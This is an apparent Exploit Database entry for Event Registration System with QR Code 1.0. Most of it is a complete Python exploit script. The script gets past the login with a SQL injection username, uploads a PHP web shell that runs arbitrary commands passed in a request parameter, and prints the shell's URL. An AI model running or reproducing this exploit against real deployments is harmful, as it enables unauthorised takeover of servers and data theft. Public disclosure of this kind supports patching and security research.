Event Registration System with QR Code 1.0 – Authentication Bypass

• Exploit Database
• 11 阅读

• 作者： Javier Olmedo
  日期： 2021-07-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50159/

• # Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
  # Exploit Author: Javier Olmedo
  # Date: 27/07/2021
  # Vendor: Sourcecodester
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
  # Affected Version: 1.0
  # Category: WebApps
  # Platform: PHP
  # Tested on: Ubuntu Server & Windows 10 Pro
   
  import os, re, sys, argparse, requests
  from termcolor import cprint
  
  def banner():
  os.system("cls")
  print('''
  _____________ 
  \_ _____/____ ____ _____/|_ 
   |__)_\\/ // __ \ /\ __\\
   |\\\\ /\___/| |\|
  /_______/ \_/\___>___|/__|
  \/ \/ \/ 
   Registration System
   --[Authentication Bypass and RCE]--
  @jjavierolmedo
  ''') 
  
  def get_args():
  parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
  parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
  parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
  args = parser.parse_args()
  return args 
  
  def auth_bypass(s, proxies, url):
  data = {
  "username":"admin'#",
  "password":""
  }
  
  r = s.post(url, data=data, proxies=proxies)
  
  if('{"status":"success"}' in r.text):
  cprint("[+] Authenticacion Bypass Success!\n", "green")
  return s
  else:
  cprint("[-] Authenticacion Bypass Error!\n", "red")
  sys.exit(0)
  
  def upload_shell(s, proxies, url):
  content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
  file = {
  'img':('cmd.php',content)
  }
  
  data = {
  "name":"Event Registration System with QR Code - PHP",
  "short_name":"ERS-QR-PHP",
  }
  
  r = s.post(url, files=file, data=data, proxies=proxies)
  
  if('1' in r.text and r.status_code == 200):
  cprint("[+] Upload Shell Success!\n", "green")
  return s
  else:
  cprint("[-] Upload Shell Error!\n", "red")
  sys.exit(0)
  
  def get_shell_url(s, proxies, url):
  r = s.get(url, proxies=proxies)
  regex = '\_cmd.php"> (.*?)</a></li>'
  shell_name = re.findall(regex, r.text)[0]
  url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
  cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")
  
  def main():
  banner()
  args = get_args()
  target = args.target
  proxies = {'http':'','https':''}
  if args.proxy:
  proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}
  
  login_url = target + "/event/classes/Login.php?f=rlogin"
  upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
  shell_url = target + "/event/uploads/"
  
  s = requests.Session()
  s = auth_bypass(s, proxies, login_url)
  s = upload_shell(s, proxies, upload_url)
  s = get_shell_url(s, proxies, shell_url)
   
  if __name__ == "__main__":
  try:
  main()
  except KeyboardInterrupt:
  cprint("[-] User aborted session\n", "red")
  sys.exit(0)
  
  # Disclaimer
  # The information contained in this notice is provided without any guarantee of use or otherwise.
  # The redistribution of this notice is explicitly permitted for insertion into vulnerability
  # databases, provided that it is not modified and due credit is granted to the author.
  # The author prohibits the malicious use of the information contained herein and accepts no responsibility.
  # All content (c)
  # Javier Olmedo